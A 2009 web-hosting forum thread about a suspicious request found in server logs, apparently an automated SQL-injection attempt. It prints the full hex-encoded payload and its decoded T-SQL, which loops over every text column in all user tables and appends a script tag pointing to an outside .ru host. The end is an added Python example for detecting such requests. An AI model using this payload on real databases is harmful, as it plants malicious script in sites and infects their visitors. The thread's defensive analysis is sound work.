Hack Attempt?

Discussion in 'General troubleshooting' started by daveswebcom, Nov 4, 2009.

  1. I found an odd looking request in my log files:
    "/default.asp?guid=road_to_the_derby200303110002;declare%20@s%20varchar(4000);set%20@s=cast(0x4465434c417265204054207641726368415228323535292c406320564152436861522832353529204445634c415245207461426c655f637552736f7220635552734f5220466f722073654c65637420412e4e414d652c622e4e614d452066724f6d207379736f624a4543747320612c735973634f6c756d4e73206220776845526520412e69643d422e496420616e4420412e58747950653d27552720616e642028622e78745970453d3939206f5220622e78545970653d3335204f7220622e78745970653d323331204f5220422e78547950653d31363729204f70654e205441424c455f437572736f52204665546368204e4578542046524f6d207441626c655f435572736f7220494e546f2040542c4063207748496c6528404046457443485f7354615455733d302920624567696e20657845632827557064617445205b272b40742b275d20536554205b272b40432b275d3d727472494d28436f4e7645725428766152436841522834303030292c5b272b40432b275d29292b63617354283078334337333633373236393730373432303733373236333344363837343734373033413246324637373737373732453639364536343635373836413733324537323735324637303631363736353245364137333345334332463733363337323639373037343345204153207641524368617228353229292729206645746368204e4578742066726f4d205441626c655f635552736f7220696e744f2040742c404320654e6420434c6f5345205461624c655f437552734f72204445614c6c6f43617465207441626c655f435572736f7220%20as%20varchar(4000));exec(@s);--"

    Using http://www.string-functions.com/hex-string.aspx, I converted the Hex code into this string:
    "/default.asp?guid=road_to_the_derby200303110002;declare%20@s%20varchar(4000);set%20@s=
    DeCLAre @T vArchAR(255),@c VARChaR(255) DEcLARE taBle_cuRsor cURsOR For seLect A.NAMe,b.NaME frOm sysobJECts a,sYscOlumNs b whERe A.id=B.Id anD A.XtyPe='U' and (b.xtYpE=99 oR b.xTYpe=35 Or b.xtYpe=231 OR B.xTyPe=167) OpeN TABLE_CursoR FeTch NExT FROm tAble_CUrsor INTo @T,@c wHIle(@@FEtCH_sTaTUs=0) bEgin exEc('UpdatE ['+@t+'] SeT ['+@C+']=rtrIM(CoNvErT(vaRChAR(4000),['+@C+']))+
    ‘<script src=http://www.indexjs.ru/page.js></script>’
    ') fEtch NExt froM TAble_cURsor intO @t,@C eNd CLoSE TabLe_CuRsOr DEaLloCate tAble_CUrsor
    %20as%20varchar(4000));exec(@s);--"

    It looks like they were poking around for a SQLServer instance on the box and trying to make it run a .js page (currently removed from www.indexjs.ru).
    What do you think they were up to?
    Dave
     
  2. Bruce (DiscountASP.NET Staff)

    SQL Injection attempts.

    There are a lot of bots out there that send this kind of request. You'll see a lot of these.
     
  3. Any Precautions We Should Take?

    Anything we should do to look for these? It was a 404 error, so my code handled it specially and logged it.
    I doubt the web server ever let the request get as far as executing SQL code...at least I hope so.
    Dave
     
  4. Google "http://www.indexjs.ru/page.js" and you will find pages that apparently had this script link embedded in them when the page was googled. All that I checked now have this link removed. Wonder what this page.js does?
     
  5. mjp

    If the SQL injection is a valid request, the query could be run.

    We do have a Tipping Point intrusion protection device that has a database that is updated to block common exploit attempts, and it blocks millions of them every day. But devices like that are why these knuckleheads are obfuscating the request by encoding it - to try to get around blocks.

    The best thing you can do is ensure that any form on your site that accepts user input validates or cleans the input to strip out anything malicious. That is the step that most people ignore, and that is how most SQL injections take hold.
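
One way to look for these requests in web logs, as an added example that is not part of any post in this thread: it URL-decodes a logged request, unwraps `cast(0x... as varchar(n))` layers the way Dave did by hand, and flags the result. The function names, keyword list and sample payload are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# The T-SQL idiom seen in the logged request: cast(0x<hex> as varchar(n))
HEX_CAST = re.compile(
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?varchar\s*\(\s*\d+\s*\)\s*\)", re.I)
# Assumed keyword list: T-SQL words that have no place in a query-string value
SUSPICIOUS = re.compile(r"\b(declare|exec|cursor|sysobjects|syscolumns)\b", re.I)

def decode_hex_casts(text, depth=3):
    """Replace each cast(0x.. as varchar(n)) with its decoded text, following nesting."""
    def repl(m):
        h = m.group(1)
        if len(h) % 2:
            return m.group(0)              # odd-length hex: leave untouched
        return bytes.fromhex(h).decode("latin-1")
    for _ in range(depth):                 # bounded, so nested layers cannot loop forever
        new = HEX_CAST.sub(repl, text)
        if new == text:
            break
        text = new
    return text

def inspect_request(url):
    """Return (flagged, decoded) for one logged request URL."""
    raw = unquote(url)                     # %20 -> space, as in the logged request
    decoded = decode_hex_casts(raw)
    flagged = bool(HEX_CAST.search(raw) or SUSPICIOUS.search(decoded))
    return flagged, decoded

def build_sample():
    # Constructed sample: harmless strings hex-encoded in the same two layers
    inner = "<b>constructed marker</b>".encode().hex()
    body = f"SELECT 'x'+cast(0x{inner} as varchar(52))".encode().hex()
    return ("/default.asp?guid=abc123;declare%20@s%20varchar(4000);"
            f"set%20@s=cast(0x{body}%20as%20varchar(4000));exec(@s);--")

if __name__ == "__main__":
    for url in (build_sample(), "/default.asp?guid=road_to_the_derby200303110002"):
        flagged, decoded = inspect_request(url)
        print("SUSPICIOUS" if flagged else "ok", decoded)
```

A hit in the logs only shows that the request was sent; whether it could run depends on how the page builds its query from `guid`.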
     
